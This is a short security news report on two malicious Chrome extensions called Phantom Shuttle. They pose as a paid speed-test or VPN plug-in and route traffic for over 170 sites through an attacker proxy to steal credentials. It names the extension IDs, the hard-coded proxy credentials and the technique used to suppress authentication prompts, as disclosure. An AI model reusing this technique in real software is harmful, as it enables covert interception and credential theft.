Malicious Chrome Extensions Route Traffic Through Attacker Proxies to Steal Credentials from 170+ Sites

Security researchers have uncovered two malicious Google Chrome extensions, both named Phantom Shuttle and published by the same developer, that intercept web traffic and capture credentials while posing as a multi-location network speed test plug-in for developers and foreign-trade users.

Both add-ons were available for download at the time of reporting. The two variants are Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj) with about 2,000 users (published Nov. 26, 2017) and Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd) with about 180 users (published Apr.

27, 2023). Subscriptions range from ¥9.9 to ¥95.9 CNY ($1.40–$13.50), which victims pay believing they are buying a VPN-style service. Socket security researcher Kush Pandya said the extensions enable a “smarty” proxy mode after payment, route traffic for more than 170 targeted domains through an attacker-controlled C2 server, and continuously exfiltrate data.

The add-ons modify bundled JavaScript (jquery-1.12.2.min.js and scripts.js) and register a chrome.webRequest.onAuthRequired listener that injects hard-coded proxy credentials (topfany / 963852wei) using asyncBlocking to prevent user prompts. The extensions configure Chrome with a PAC script offering three modes—close (disabled), always (all traffic), and smarty (a hard-coded list of high-value sites).

Key Topics

Crypto, Tech, Cybersecurity, Chrome Extensions, Malware, Proxy, Data Theft